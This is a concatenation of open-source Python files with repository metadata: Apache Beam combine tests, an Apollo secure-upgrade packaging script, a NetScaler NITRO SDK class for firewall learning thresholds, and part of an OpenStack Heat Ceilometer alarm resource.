small_sum = pc | beam.CombineGlobally(bounded_sum) # [500]
large_sum = pc | beam.CombineGlobally(bounded_sum, bound=5000) # [1111]
# [END combine_bounded_sum]
self.assertEqual([500], small_sum)
self.assertEqual([1111], large_sum)
def test_combine_reduce(self):
factors = [2, 3, 5, 7]
# [START combine_reduce]
import functools
import operator
product = factors | beam.CombineGlobally(
functools.partial(reduce, operator.mul), 1)
# [END combine_reduce]
self.assertEqual([210], product)
def test_custom_average(self):
pc = [2, 3, 5, 7]
# [START combine_custom_average]
class AverageFn(beam.CombineFn):
def create_accumulator(self):
return (0.0, 0)
def add_input(self, (sum, count), input):
return sum + input, count + 1
def merge_accumulators(self, accumulators):
sums, counts = zip(*accumulators)
return sum(sums), sum(counts)
def extract_output(self, (sum, count)):
return sum / count if count else float('NaN')
average = pc | beam.CombineGlobally(AverageFn())
# [END combine_custom_average]
self.assertEqual([4.25], average)
def test_keys(self):
occurrences = [('cat', 1), ('cat', 5), ('dog', 5), ('cat', 9), ('dog', 2)]
unique_keys = occurrences | snippets.Keys()
self.assertEqual({'cat', 'dog'}, set(unique_keys))
def test_count(self):
occurrences = ['cat', 'dog', 'cat', 'cat', 'dog']
perkey_counts = occurrences | snippets.Count()
self.assertEqual({('cat', 3), ('dog', 2)}, set(perkey_counts))
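# Editor's sketch (not part of the original test suite): the combine snippets
# above apply transforms directly to plain Python lists and compare the
# materialized results. The same global combine can also be written against an
# explicit TestPipeline, using only helpers already imported in this module
# (TestPipeline, beam.Create, beam.CombineGlobally, assert_that, equal_to).
def _editor_example_global_sum_with_pipeline():
  p = TestPipeline()
  result = p | beam.Create([1, 2, 3]) | beam.CombineGlobally(sum)
  assert_that(result, equal_to([6]))
  p.run()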
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
jasonkuster/incubator-beam
|
sdks/python/apache_beam/examples/snippets/snippets_test.py
|
Python
|
apache-2.0
| 28,632
|
#!/usr/bin/env python3
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import sys
# The vendored secure-upgrade bindings live outside the default module search
# path, so extend sys.path before importing them.
sys.path.append('/home/caros/secure_upgrade/python')
import secure_upgrade_export as sec_api
root_config_path = "/home/caros/secure_upgrade/config/secure_config.json"
ret = sec_api.init_secure_upgrade(root_config_path)
if ret is True:
    print('Security environment initialized successfully!')
else:
    print('Security environment initialization failed!')
exit(1)
homedir = os.environ['HOME']
release_tgz = homedir + '/.cache/apollo_release.tar.gz'
sec_release_tgz = homedir + '/.cache/sec_apollo_release.tar.gz'
package_token = homedir + '/.cache/package_token'
ret = sec_api.sec_upgrade_get_package(
release_tgz, sec_release_tgz, package_token)
if ret is True:
print('Security package generated successfully!')
else:
    print('Security package generation failed!')
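# Editor's note (not part of the original tool): a minimal, hypothetical sanity
# check. It assumes sec_upgrade_get_package writes the signed package and the
# token to the output paths passed above, which this script implies but does
# not state explicitly.
if ret is True:
    for artifact in (sec_release_tgz, package_token):
        if not os.path.exists(artifact):
            print('Missing expected output: %s' % artifact)
            exit(1)
    print('Wrote %s and %s' % (sec_release_tgz, package_token))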
|
ApolloAuto/apollo
|
modules/tools/ota/create_sec_package.py
|
Python
|
apache-2.0
| 1,573
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appfwlearningsettings(base_resource) :
""" Configuration for learning settings resource. """
def __init__(self) :
self._profilename = ""
self._starturlminthreshold = 0
self._starturlpercentthreshold = 0
self._cookieconsistencyminthreshold = 0
self._cookieconsistencypercentthreshold = 0
self._csrftagminthreshold = 0
self._csrftagpercentthreshold = 0
self._fieldconsistencyminthreshold = 0
self._fieldconsistencypercentthreshold = 0
self._crosssitescriptingminthreshold = 0
self._crosssitescriptingpercentthreshold = 0
self._sqlinjectionminthreshold = 0
self._sqlinjectionpercentthreshold = 0
self._fieldformatminthreshold = 0
self._fieldformatpercentthreshold = 0
self._xmlwsiminthreshold = 0
self._xmlwsipercentthreshold = 0
self._xmlattachmentminthreshold = 0
self._xmlattachmentpercentthreshold = 0
self.___count = 0
@property
def profilename(self) :
ur"""Name of the profile.<br/>Minimum length = 1.
"""
try :
return self._profilename
except Exception as e:
raise e
@profilename.setter
def profilename(self, profilename) :
ur"""Name of the profile.<br/>Minimum length = 1
"""
try :
self._profilename = profilename
except Exception as e:
raise e
@property
def starturlminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn start URLs.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._starturlminthreshold
except Exception as e:
raise e
@starturlminthreshold.setter
def starturlminthreshold(self, starturlminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn start URLs.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._starturlminthreshold = starturlminthreshold
except Exception as e:
raise e
@property
def starturlpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular start URL pattern for the learning engine to learn that start URL.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._starturlpercentthreshold
except Exception as e:
raise e
@starturlpercentthreshold.setter
def starturlpercentthreshold(self, starturlpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular start URL pattern for the learning engine to learn that start URL.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._starturlpercentthreshold = starturlpercentthreshold
except Exception as e:
raise e
@property
def cookieconsistencyminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cookies.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._cookieconsistencyminthreshold
except Exception as e:
raise e
@cookieconsistencyminthreshold.setter
def cookieconsistencyminthreshold(self, cookieconsistencyminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cookies.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._cookieconsistencyminthreshold = cookieconsistencyminthreshold
except Exception as e:
raise e
@property
def cookieconsistencypercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cookie pattern for the learning engine to learn that cookie.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._cookieconsistencypercentthreshold
except Exception as e:
raise e
@cookieconsistencypercentthreshold.setter
def cookieconsistencypercentthreshold(self, cookieconsistencypercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cookie pattern for the learning engine to learn that cookie.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._cookieconsistencypercentthreshold = cookieconsistencypercentthreshold
except Exception as e:
raise e
@property
def csrftagminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cross-site request forgery (CSRF) tags.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._csrftagminthreshold
except Exception as e:
raise e
@csrftagminthreshold.setter
def csrftagminthreshold(self, csrftagminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn cross-site request forgery (CSRF) tags.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._csrftagminthreshold = csrftagminthreshold
except Exception as e:
raise e
@property
def csrftagpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular CSRF tag for the learning engine to learn that CSRF tag.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._csrftagpercentthreshold
except Exception as e:
raise e
@csrftagpercentthreshold.setter
def csrftagpercentthreshold(self, csrftagpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular CSRF tag for the learning engine to learn that CSRF tag.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._csrftagpercentthreshold = csrftagpercentthreshold
except Exception as e:
raise e
@property
def fieldconsistencyminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field consistency information.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._fieldconsistencyminthreshold
except Exception as e:
raise e
@fieldconsistencyminthreshold.setter
def fieldconsistencyminthreshold(self, fieldconsistencyminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field consistency information.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._fieldconsistencyminthreshold = fieldconsistencyminthreshold
except Exception as e:
raise e
@property
def fieldconsistencypercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular field consistency pattern for the learning engine to learn that field consistency pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._fieldconsistencypercentthreshold
except Exception as e:
raise e
@fieldconsistencypercentthreshold.setter
def fieldconsistencypercentthreshold(self, fieldconsistencypercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular field consistency pattern for the learning engine to learn that field consistency pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._fieldconsistencypercentthreshold = fieldconsistencypercentthreshold
except Exception as e:
raise e
@property
def crosssitescriptingminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML cross-site scripting patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._crosssitescriptingminthreshold
except Exception as e:
raise e
@crosssitescriptingminthreshold.setter
def crosssitescriptingminthreshold(self, crosssitescriptingminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML cross-site scripting patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._crosssitescriptingminthreshold = crosssitescriptingminthreshold
except Exception as e:
raise e
@property
def crosssitescriptingpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cross-site scripting pattern for the learning engine to learn that cross-site scripting pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._crosssitescriptingpercentthreshold
except Exception as e:
raise e
@crosssitescriptingpercentthreshold.setter
def crosssitescriptingpercentthreshold(self, crosssitescriptingpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular cross-site scripting pattern for the learning engine to learn that cross-site scripting pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._crosssitescriptingpercentthreshold = crosssitescriptingpercentthreshold
except Exception as e:
raise e
@property
def sqlinjectionminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML SQL injection patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._sqlinjectionminthreshold
except Exception as e:
raise e
@sqlinjectionminthreshold.setter
def sqlinjectionminthreshold(self, sqlinjectionminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn HTML SQL injection patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._sqlinjectionminthreshold = sqlinjectionminthreshold
except Exception as e:
raise e
@property
def sqlinjectionpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular HTML SQL injection pattern for the learning engine to learn that HTML SQL injection pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._sqlinjectionpercentthreshold
except Exception as e:
raise e
@sqlinjectionpercentthreshold.setter
def sqlinjectionpercentthreshold(self, sqlinjectionpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular HTML SQL injection pattern for the learning engine to learn that HTML SQL injection pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._sqlinjectionpercentthreshold = sqlinjectionpercentthreshold
except Exception as e:
raise e
@property
def fieldformatminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field formats.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._fieldformatminthreshold
except Exception as e:
raise e
@fieldformatminthreshold.setter
def fieldformatminthreshold(self, fieldformatminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn field formats.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._fieldformatminthreshold = fieldformatminthreshold
except Exception as e:
raise e
@property
def fieldformatpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular web form field pattern for the learning engine to recommend a field format for that form field.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._fieldformatpercentthreshold
except Exception as e:
raise e
@fieldformatpercentthreshold.setter
def fieldformatpercentthreshold(self, fieldformatpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular web form field pattern for the learning engine to recommend a field format for that form field.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._fieldformatpercentthreshold = fieldformatpercentthreshold
except Exception as e:
raise e
@property
def xmlwsiminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn web services interoperability (WSI) information.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._xmlwsiminthreshold
except Exception as e:
raise e
@xmlwsiminthreshold.setter
def xmlwsiminthreshold(self, xmlwsiminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn web services interoperability (WSI) information.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._xmlwsiminthreshold = xmlwsiminthreshold
except Exception as e:
raise e
@property
def xmlwsipercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular pattern for the learning engine to learn a web services interoperability (WSI) pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._xmlwsipercentthreshold
except Exception as e:
raise e
@xmlwsipercentthreshold.setter
def xmlwsipercentthreshold(self, xmlwsipercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular pattern for the learning engine to learn a web services interoperability (WSI) pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._xmlwsipercentthreshold = xmlwsipercentthreshold
except Exception as e:
raise e
@property
def xmlattachmentminthreshold(self) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn XML attachment patterns.<br/>Default value: 1<br/>Minimum length = 1.
"""
try :
return self._xmlattachmentminthreshold
except Exception as e:
raise e
@xmlattachmentminthreshold.setter
def xmlattachmentminthreshold(self, xmlattachmentminthreshold) :
ur"""Minimum number of application firewall sessions that the learning engine must observe to learn XML attachment patterns.<br/>Default value: 1<br/>Minimum length = 1
"""
try :
self._xmlattachmentminthreshold = xmlattachmentminthreshold
except Exception as e:
raise e
@property
def xmlattachmentpercentthreshold(self) :
ur"""Minimum percentage of application firewall sessions that must contain a particular XML attachment pattern for the learning engine to learn that XML attachment pattern.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._xmlattachmentpercentthreshold
except Exception as e:
raise e
@xmlattachmentpercentthreshold.setter
def xmlattachmentpercentthreshold(self, xmlattachmentpercentthreshold) :
ur"""Minimum percentage of application firewall sessions that must contain a particular XML attachment pattern for the learning engine to learn that XML attachment pattern.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._xmlattachmentpercentthreshold = xmlattachmentpercentthreshold
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appfwlearningsettings_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appfwlearningsettings
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.profilename is not None :
return str(self.profilename)
return None
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update appfwlearningsettings.
"""
try :
if type(resource) is not list :
updateresource = appfwlearningsettings()
updateresource.profilename = resource.profilename
updateresource.starturlminthreshold = resource.starturlminthreshold
updateresource.starturlpercentthreshold = resource.starturlpercentthreshold
updateresource.cookieconsistencyminthreshold = resource.cookieconsistencyminthreshold
updateresource.cookieconsistencypercentthreshold = resource.cookieconsistencypercentthreshold
updateresource.csrftagminthreshold = resource.csrftagminthreshold
updateresource.csrftagpercentthreshold = resource.csrftagpercentthreshold
updateresource.fieldconsistencyminthreshold = resource.fieldconsistencyminthreshold
updateresource.fieldconsistencypercentthreshold = resource.fieldconsistencypercentthreshold
updateresource.crosssitescriptingminthreshold = resource.crosssitescriptingminthreshold
updateresource.crosssitescriptingpercentthreshold = resource.crosssitescriptingpercentthreshold
updateresource.sqlinjectionminthreshold = resource.sqlinjectionminthreshold
updateresource.sqlinjectionpercentthreshold = resource.sqlinjectionpercentthreshold
updateresource.fieldformatminthreshold = resource.fieldformatminthreshold
updateresource.fieldformatpercentthreshold = resource.fieldformatpercentthreshold
updateresource.xmlwsiminthreshold = resource.xmlwsiminthreshold
updateresource.xmlwsipercentthreshold = resource.xmlwsipercentthreshold
updateresource.xmlattachmentminthreshold = resource.xmlattachmentminthreshold
updateresource.xmlattachmentpercentthreshold = resource.xmlattachmentpercentthreshold
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].profilename = resource[i].profilename
updateresources[i].starturlminthreshold = resource[i].starturlminthreshold
updateresources[i].starturlpercentthreshold = resource[i].starturlpercentthreshold
updateresources[i].cookieconsistencyminthreshold = resource[i].cookieconsistencyminthreshold
updateresources[i].cookieconsistencypercentthreshold = resource[i].cookieconsistencypercentthreshold
updateresources[i].csrftagminthreshold = resource[i].csrftagminthreshold
updateresources[i].csrftagpercentthreshold = resource[i].csrftagpercentthreshold
updateresources[i].fieldconsistencyminthreshold = resource[i].fieldconsistencyminthreshold
updateresources[i].fieldconsistencypercentthreshold = resource[i].fieldconsistencypercentthreshold
updateresources[i].crosssitescriptingminthreshold = resource[i].crosssitescriptingminthreshold
updateresources[i].crosssitescriptingpercentthreshold = resource[i].crosssitescriptingpercentthreshold
updateresources[i].sqlinjectionminthreshold = resource[i].sqlinjectionminthreshold
updateresources[i].sqlinjectionpercentthreshold = resource[i].sqlinjectionpercentthreshold
updateresources[i].fieldformatminthreshold = resource[i].fieldformatminthreshold
updateresources[i].fieldformatpercentthreshold = resource[i].fieldformatpercentthreshold
updateresources[i].xmlwsiminthreshold = resource[i].xmlwsiminthreshold
updateresources[i].xmlwsipercentthreshold = resource[i].xmlwsipercentthreshold
updateresources[i].xmlattachmentminthreshold = resource[i].xmlattachmentminthreshold
updateresources[i].xmlattachmentpercentthreshold = resource[i].xmlattachmentpercentthreshold
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of appfwlearningsettings resource.
        Properties that need to be unset are specified in the args array.
"""
try :
if type(resource) is not list :
unsetresource = appfwlearningsettings()
if type(resource) != type(unsetresource):
unsetresource.profilename = resource
else :
unsetresource.profilename = resource.profilename
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].profilename = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ appfwlearningsettings() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].profilename = resource[i].profilename
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the appfwlearningsettings resources that are configured on netscaler.
"""
try :
if not name :
obj = appfwlearningsettings()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = appfwlearningsettings()
obj.profilename = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [appfwlearningsettings() for _ in range(len(name))]
obj = [appfwlearningsettings() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = appfwlearningsettings()
obj[i].profilename = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
ur""" Use this API to fetch filtered set of appfwlearningsettings resources.
        Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
ur""" Use this API to count the appfwlearningsettings resources configured on NetScaler.
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
ur""" Use this API to count filtered the set of appfwlearningsettings resources.
        Filter string should be in JSON format, e.g.: "port:80,servicetype:HTTP".
"""
try :
obj = appfwlearningsettings()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class appfwlearningsettings_response(base_response) :
def __init__(self, length=1) :
self.appfwlearningsettings = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appfwlearningsettings = [appfwlearningsettings() for _ in range(length)]
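# ---------------------------------------------------------------------------
# Editor's sketch (not part of the generated SDK module): a hypothetical
# client-side flow that fetches the learning settings of one profile, raises
# its start-URL thresholds and pushes the change back. The nitro_service
# client class ships with this SDK; the address, credentials and profile name
# are placeholders supplied by the caller.
# ---------------------------------------------------------------------------
def _editor_example_tune_learning_thresholds(ns_ip, user, password, profile):
    from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
    client = nitro_service(ns_ip, "http")
    client.login(user, password)
    try:
        # Fetch the current settings for the profile and show one threshold.
        current = appfwlearningsettings.get(client, profile)
        print("starturlminthreshold is currently %s" % current.starturlminthreshold)
        # Raise the start-URL learning thresholds and apply the update.
        update = appfwlearningsettings()
        update.profilename = profile
        update.starturlminthreshold = 10
        update.starturlpercentthreshold = 5
        appfwlearningsettings.update(client, update)
    finally:
        client.logout()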
|
benfinke/ns_python
|
nssrc/com/citrix/netscaler/nitro/resource/config/appfw/appfwlearningsettings.py
|
Python
|
apache-2.0
| 24,257
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import watchrule
COMMON_PROPERTIES = (
ALARM_ACTIONS, OK_ACTIONS, REPEAT_ACTIONS, INSUFFICIENT_DATA_ACTIONS,
DESCRIPTION, ENABLED,
) = (
'alarm_actions', 'ok_actions', 'repeat_actions',
'insufficient_data_actions', 'description', 'enabled',
)
common_properties_schema = {
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description for the alarm.'),
update_allowed=True
),
ENABLED: properties.Schema(
properties.Schema.BOOLEAN,
_('True if alarm evaluation/actioning is enabled.'),
default='true',
update_allowed=True
),
ALARM_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'alarm.'),
update_allowed=True
),
OK_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'ok.'),
update_allowed=True
),
INSUFFICIENT_DATA_ACTIONS: properties.Schema(
properties.Schema.LIST,
_('A list of URLs (webhooks) to invoke when state transitions to '
'insufficient-data.'),
update_allowed=True
),
REPEAT_ACTIONS: properties.Schema(
properties.Schema.BOOLEAN,
_("False to trigger actions when the threshold is reached AND "
"the alarm's state has changed. By default, actions are called "
"each time the threshold is reached."),
default='true',
update_allowed=True
)
}
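# Editor's note (not part of the original module): in a template, the shared
# properties above combine with the CeilometerAlarm-specific properties
# defined below roughly as sketched here. The resource type name is an
# assumption (it is registered outside this excerpt), and the Fn::GetAtt form
# mirrors the comment in actions_to_urls() below.
#
#   cpu_alarm_high:
#     type: OS::Ceilometer::Alarm
#     properties:
#       description: Scale up when average CPU utilisation stays above 50%
#       meter_name: cpu_util
#       statistic: avg
#       period: 60
#       evaluation_periods: 1
#       threshold: 50
#       comparison_operator: gt
#       alarm_actions:
#         - {'Fn::GetAtt': [ScaleUpPolicy, AlarmUrl]}
#       repeat_actions: true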
NOVA_METERS = ['instance', 'memory', 'memory.usage',
'cpu', 'cpu_util', 'vcpus',
'disk.read.requests', 'disk.read.requests.rate',
'disk.write.requests', 'disk.write.requests.rate',
'disk.read.bytes', 'disk.read.bytes.rate',
'disk.write.bytes', 'disk.write.bytes.rate',
'disk.device.read.requests', 'disk.device.read.requests.rate',
'disk.device.write.requests', 'disk.device.write.requests.rate',
'disk.device.read.bytes', 'disk.device.read.bytes.rate',
'disk.device.write.bytes', 'disk.device.write.bytes.rate',
'disk.root.size', 'disk.ephemeral.size',
'network.incoming.bytes', 'network.incoming.bytes.rate',
'network.outgoing.bytes', 'network.outgoing.bytes.rate',
'network.incoming.packets', 'network.incoming.packets.rate',
'network.outgoing.packets', 'network.outgoing.packets.rate']
def actions_to_urls(stack, properties):
kwargs = {}
for k, v in iter(properties.items()):
if k in [ALARM_ACTIONS, OK_ACTIONS,
INSUFFICIENT_DATA_ACTIONS] and v is not None:
kwargs[k] = []
for act in v:
# if the action is a resource name
# we ask the destination resource for an alarm url.
# the template writer should really do this in the
# template if possible with:
# {Fn::GetAtt: ['MyAction', 'AlarmUrl']}
if act in stack:
url = stack[act].FnGetAtt('AlarmUrl')
kwargs[k].append(url)
else:
if act:
kwargs[k].append(act)
else:
kwargs[k] = v
return kwargs
class CeilometerAlarm(resource.Resource):
PROPERTIES = (
COMPARISON_OPERATOR, EVALUATION_PERIODS, METER_NAME, PERIOD,
STATISTIC, THRESHOLD, MATCHING_METADATA, QUERY,
) = (
'comparison_operator', 'evaluation_periods', 'meter_name', 'period',
'statistic', 'threshold', 'matching_metadata', 'query',
)
QUERY_FACTOR_FIELDS = (
QF_FIELD, QF_OP, QF_VALUE,
) = (
'field', 'op', 'value',
)
QF_OP_VALS = constraints.AllowedValues(['le', 'ge', 'eq',
'lt', 'gt', 'ne'])
properties_schema = {
COMPARISON_OPERATOR: properties.Schema(
properties.Schema.STRING,
_('Operator used to compare specified statistic with threshold.'),
constraints=[
constraints.AllowedValues(['ge', 'gt', 'eq', 'ne', 'lt',
'le']),
],
update_allowed=True
),
EVALUATION_PERIODS: properties.Schema(
properties.Schema.INTEGER,
_('Number of periods to evaluate over.'),
update_allowed=True
),
METER_NAME: properties.Schema(
properties.Schema.STRING,
_('Meter name watched by the alarm.'),
required=True
),
PERIOD: properties.Schema(
properties.Schema.INTEGER,
_('Period (seconds) to evaluate over.'),
update_allowed=True
),
STATISTIC: properties.Schema(
properties.Schema.STRING,
_('Meter statistic to evaluate.'),
constraints=[
constraints.AllowedValues(['count', 'avg', 'sum', 'min',
'max']),
],
update_allowed=True
),
THRESHOLD: properties.Schema(
properties.Schema.NUMBER,
_('Threshold to evaluate against.'),
required=True,
update_allowed=True
),
MATCHING_METADATA: properties.Schema(
properties.Schema.MAP,
            _('Meter should match this resource metadata (key=value) '
              'in addition to the meter_name.'),
default={},
update_allowed=True
),
QUERY: properties.Schema(
properties.Schema.LIST,
_('A list of query factors, each comparing '
'a Sample attribute with a value. '
'Implicitly combined with matching_metadata, if any.'),
update_allowed=True,
support_status=support.SupportStatus(version='2015.1'),
schema=properties.Schema(
properties.Schema.MAP,
schema={
QF_FIELD: properties.Schema(
properties.Schema.STRING,
_('Name of attribute to compare. '
'Names of the form metadata.user_metadata.X '
'or metadata.metering.X are equivalent to what '
'you can address through matching_metadata; '
'the former for Nova meters, '
'the latter for all others. '
'To see the attributes of your Samples, '
'use `ceilometer --debug sample-list`.')
),
QF_OP: properties.Schema(
properties.Schema.STRING,
_('Comparison operator'),
constraints=[QF_OP_VALS]
),
QF_VALUE: properties.Schema(
properties.Schema.STRING,
_('String value with which to compare')
)
}
)
)
}
properties_schema.update(common_properties_schema)
default_client_name = 'ceilometer'
def cfn_to_ceilometer(self, stack, properties):
"""Apply all relevant compatibility xforms."""
kwargs = actions_to_urls(stack, properties)
kwargs['type'] = 'threshold'
if kwargs.get(self.METER_NAME) in NOVA_METERS:
prefix = 'user_metadata.'
else:
prefix = 'metering.'
rule = {}
for field in ['period', 'evaluation_periods', 'threshold',
'statistic', 'comparison_operator', 'meter_name']:
if field in kwargs:
rule[field] = kwargs[field]
del kwargs[field]
mmd = properties.get(self.MATCHING_METADATA) or {}
query = properties.get(self.QUERY) or []
# make sure the matching_metadata appears in the query like this:
# {field: metadata.$prefix.x, ...}
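        # For example (illustrative values), with a Nova meter and
        # matching_metadata {'server_group': 'group1'}, the query gains:
        #   {'field': 'metadata.user_metadata.server_group',
        #    'op': 'eq', 'value': 'group1'}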
